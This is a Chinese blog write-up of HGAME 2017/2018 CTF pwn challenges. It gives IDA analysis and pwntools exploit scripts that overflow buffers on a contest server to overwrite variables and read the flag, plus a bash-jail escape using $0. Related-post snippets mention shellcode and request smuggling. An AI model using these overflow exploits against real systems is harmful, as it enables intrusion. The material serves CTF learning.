HGAME 2017 or 2018 PWN levels

最新推荐文章于 2022-03-27 16:39:21 发布
最新推荐文章于 2022-03-27 16:39:21 发布
阅读量932 收藏
点赞数
分类专栏: PWN_WP CTF_WP 文章标签: HGAME PWN levels
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_42192672/article/details/83859936
版权
本文详细介绍了HGAME 2017或2018年PWN类挑战的解决过程,包括各种缓冲区溢出、格式字符串漏洞、堆溢出等技术的利用,涉及ida分析、exp编写等内容,适合逆向工程和安全研究爱好者学习。
摘要由CSDN通过智能技术生成

这个算是做之前的复现吧,感谢Veritas501

WEEK1

1.flag server

拖进IDA看一下

流程倒着看,要有flag-----v8=1-----v5=v6-----s1=admin,我们可以把s1覆盖掉-----username长度不能大于63,不能等于0-----之后还要猜出随机数v6,看一下怎么覆盖

这些变量都在一起,美滋滋

exp

from pwn import *

cn=remote('111.230.149.72',30001)

cn.sendline('xiaoyuyu')
cn.recvuntil("your username length: ")
cn.sendline('-1')
payload='a'*(0x50-0x10)+p64(1)
cn.recvuntil("whats your username?")
cn.sendline(payload)
cn.interactive()

2.guess number

scanf直接溢出就好了,如下

a1和nptr的偏移量 0x10C+0x8

exp

from pwn import *

cn=remote('111.230.149.72',30002)

cn.sendline("xiaoyuyu")

payload='0'*(0x10C+0x8)+p64(0)

cn.send(payload)

cn.interactive()

3.zazahui

这次有两个文件,古天乐和正常的

拖进IDA

里面两个函数,第一个是个file open之类的,读取flag和ad的值,第二个函数如下

感觉没啥溢出的地方,跟进函数sub_8048634

基本可以猜测出就是个read函数,范围是188,我们可以看到s1的范围从0xC0到0x10,只有176,那么这个函数就溢出了,把读取的地址改到flag的地址,同时有一点要注意,要把v3变成100,不然flag读不出来

exp

#coding=utf8
from pwn import *
context.log_level = 'debug'
context.terminal = ['gnome-terminal','-x','bash','-c']

local = 0

if local:
        cn = process('./zazahui')
        bin = ELF('./zazahui')
        #libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
        libc = ELF('/lib/i386-linux-gnu/libc-2.23.so')
else:
        cn = remote('111.230.149.72',30003)
        bin = ELF('./zazahui')
        libc = ELF('./libc32.so')


def z(a=''):
        gdb.attach(cn,a)
        if a == '':
                raw_input()

cn.sendline("xiaoyuyu")
flag_addr=0x0804A060
payload='a'*176+p32(flag_addr)+p32(100)
cn.recvuntil('> ')
cn.sendline(payload)

cn.interactive()
#local x64: main_arena = 0x3c4b20
#local x86: main_arena = 0x1b2780

WEEK2

4.bash jail

可还行,拖进IDA看一下

我第一反应是把Lineptr改成/bin/sh

分析一下里面的函数,400706里面的意思是如果开头输入的是(a,b,c,f,h,g,i,l,n,s,t,*)会输出hacker!! go away~~ QAQ

那我们输入数字试一下,情况如下

大概了解了,应该是shell的脚本,在shell里面有如下这些

我就试着$0,然后打我想要的指令,竟然成功了,原理要是不是这样的,不要喷我,

最低0.47元/天 解锁文章
xiaoyuyulala
关注
专栏目录
Hgame
忙碌者的博客
02-06 5270
Hgame WEEK1 1.换头大作战 题目地址 题目首先是这样一个界面,既然让我提交,那自然要提交试试,随便填个1进去提交试试。 提交完提示: request method is error.I think POST is better 既然让我POST,果断调出HACKBAR,同时注意到url后面多了个want变量,自然想到去POST这个want。 构造want=1,RUN,得到下图:需要lo...
HGAME
Strangers_huan的博客
01-23 625
Easy RSA 先把最后的数据做下处理 四个为一组,分别为e,p,q,c,依次求得明文即可 import gmpy2 from libnum import n2s a = [12433, 149, 197, 104, 8147, 131, 167, 6633, 10687, 211, 197, 35594, 19681, 131, 211, 15710, 33577, 251, 211, 38798, 30241, 157, 251, 35973, 293, 211, 157, 31548,..
2022 hgame pwn wp
weixin_45209963的博客
03-27 4963
2022 hgame pwn wp 本来早就写好了,但是由于复试毕设等等原因拖到今天才发 包括了绝大部分题目,除了算法题spfa和bpwn,剩下一些简单题懒得写了orz 文章目录2022 hgame pwn wpWeek 1enter_the_pwn_landenter_the_evil_pwn_landoldfashion_orwWeek 2oldfashion_noteechoWeek 3changeable_noteelder_notesized_noteWeek 4vector Week 1 ent
Hgame 2021 week1 pwn刷题
qq_45595732的博客
02-06 1452
whitegive 签到 from pwn import* context.log_level = 'debug' p = remote('182.92.108.71',30210) p.sendlineafter(':',str(0x402012)) p.interactive() letter 开了沙箱,NX未开 orw思路,shellocde from pwn import* context.log_level = 'debug' libc = ELF('/lib/x86_64-linux-gnu/
CTF-PWN-babysc(Hgame)
SuperGate的博客
02-04 792
直接运行该程序,发现没有任何提示信息,随便输入一串字符之后,程序错误退出。 扔进ida查看: 程序用read函数读入buf,然后判断[rbp+var_4]和0x4f的大小关系。这里可以知道[rbp+var_4]应为循环变量,buf长度为80 然后对于buf[i] ,异或buf[i]^(i+1),最后将buf蕴含的指令赋值给rdx并执行。 我们可以考虑直接构造system(/bin/sh...
BUUCTF hgame2018_flag_server
weixin_45441024的博客
11-28 449
BUUCTF hgame2018_flag_server 下载附件之后永远都是先check一下 紧接着我们将其拖入IDA中查看一下: int __cdecl main(int argc, const char **argv, const char **envp) { unsigned int v3; // eax@13 int result; // eax@20 int v5; // ecx@20 int v6; // [sp+8h] [bp-60h]@6 int v7; // [sp
HGAME cdcollector-开源
04-24
【标题】"HGAME cdcollector-开源"是一个针对游戏收藏管理者的开源项目,它扩展了原有的cdcollector系统,特别设计用于管理和记录大量的电子游戏数据,尤其是HGAME(可能指的是成人向游戏)的数据库。这个系统利用...
hgame-2018 CTFwp(杭电信安)week1
苟有恒,必有三更眠,五更起。
03-04 3089
原题链接 由于开放时间短,不知道什么时候结束。我会将题目的大致内容以图片形式down下来。 web1 Are you from Europe? URL http://123.206.203.108:10001/European.html 一看题,就感觉想是用burp抓包做,来自欧洲,就想到改语言,accept-langue字段。 但是,我试了en,gk等等值,并没有什么卵用。而且发现
hgame:Haskell 游戏引擎
05-30
【Hgame:Haskell游戏引擎】是一个开源项目,旨在利用Haskell这门纯函数式编程语言来构建高效、灵活的游戏开发框架。Haskell以其强大的类型系统、 lazy evaluation(惰性求值)特性以及对并行和并发的良好支持,为...
hgame 2022 PWN 部分题目 Writeup
02-18 3371
hgame 2022 pwn 部分题目writeup
Hgame-Week1
qq_53086690的博客
02-08 1805
目录WebHitchhiking_in_the_Galaxywatermelon宝藏走私者智商检测鸡走私者的愤怒CryptoまひとMiscBase全家福不起眼压缩包的养成的方法Galaxy Web Hitchhiking_in_the_Galaxy 地址:http://hitchhiker42.0727.site:42420 提示:第一次在银河系里搭顺风车,要准备啥,在线等,挺急的 访问页面发现 404你来晚了,地球已经被沃贡人摧毁了。原因是地球挡住了它们的超空间快速通道。我要搭顺风车 发现请求方法不
[BUUCTF-pwn]——hgame2018_flag_server
Y_peak的博客
04-03 399
[BUUCTF-pwn]——hgame2018_flag_server 保护开启了 NX和canary 看下反汇编,只要v10非0就可以得到flag, 也就是v6 = v8,但是显然v8是一个随机数, 并且没有找到可以修改的地方。 仔细观察上面的代码,一旦v5为负数,我们就可以无限输入了,并且s1距离v10为0x40 = 64, 我们只需要输入0x40个字符就可以开始修改v10了 exploit from pwn import * p = remote("node3.buuoj.cn",28128) p
Hgame-Week3
qq_53086690的博客
03-03 696
目录WebLazyDogR4UPost to zuckonit200OK!!Liki的生日礼物 Web LazyDogR4U 地址:http://718a753f92.lazy.r4u.top 提示:懒狗R4u把Flag藏起来了,但由于他是懒狗,所以flag藏的很不安全。 进入页面之后是登录页面,用子域名爆破工具进行爆破。发现有www.zip. 下载之后分析源代码。发现有flag.php。分析代码得出 $_SESSION[‘username’] === 'admin’就会得到flag。 然后再lazy页
HGAME 2018 Web Week2 Random?
柠檬木有枝
10-21 584
题目描述 提示 vim 改代码,vim 会生成 swp 文件以防止出错是恢复,直接 dowm 下 swp 文件恢复源码,这里比较坑的一点是完整的文件名是.random.php.swp。 恢复过后 random.php 源码如下 要求传入一串对象的序列化内容,而且这个对象的两个变量会被赋予随机值,要求这两个变量的值相等方能getflag。 起初考虑了一下觉得是反序列化漏洞,但是却不存在魔术方法...
hgame是什么?【详解】 【我们不能光玩game,而不了解game的文化】
热门推荐
FreeXploiT
05-15 1万+
allyesno:今天偶闻hgame资深人士swan对hgame的言论 [12:23] 最开始的那种游戏,出现图片的时候你要按h键才能往下显示[12:24] 后来就用h-game代替了[12:24] 然后发展到hentai[12:24] 这个是日文变态的意思~嘿嘿,不过是现有h才有hentai的下面我们来看看一篇更详细的说明 希望对大家以后提高玩hgame的水平有帮助H-gam
HGAME-http欺骗
anwen12的博客
02-06 1445
https欺骗 0x01 原理分析 http走私是一个很神奇的攻击方式,他根本产生的原因是因为不同服务器对于RFC协议的执行情况不同。这里面最常见的一个例子就是CDN加速。用户通过链接距离其最近的反向代理服务器,当用户请求的静态资源在CDN服务器上有备份的时候,那么就不需要再继续进行下去了,就可以直接获取到想要的数据。 当我们向代理服务器发送一个比较模糊的HTTP请求的时候,由于两者的实现方式不同,那我们就可以浑水摸鱼,让代理服务器将我们的请求完整地转发到后端服务器,但后端服务器通过CL和TE头的检测来判
Hgame2021,web,week1
Holl0w_By的博客
02-20 328
HGAME2021,week1,web总结: 之前耽误了一段时间,现在才开始写wp。总之,果然还是实战比较管用。 1、Hitchhiking_in_the_Galaxy 这个题一进界面就有一个大大的404,只有一个链接可以点。点了之后又会回到index.php页面,这个时候就应该使用burpsuite来对该链接进行拦截和重定向。 发包后看见了一个提示: 上面提示说顺风车不是这么搭的,有一个405,这个状态码表示指定的URL不支持请求中所使用的方法。 一般来说,常用的请求方法就是GET和POST,这个时候就
hgame 2022 week1
zip471642048的博客
02-09 919
Crypto Dancing Line 八位二进制走线图→=0 ↓=1 转ASCII码 exp from PIL import Image img = Image.open('Dancing Line.bmp') width,height = img.size pix_list = [[] for i in range(136)] for w in range(width): for h in range(height): pix = img.getpixel((w,h))
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值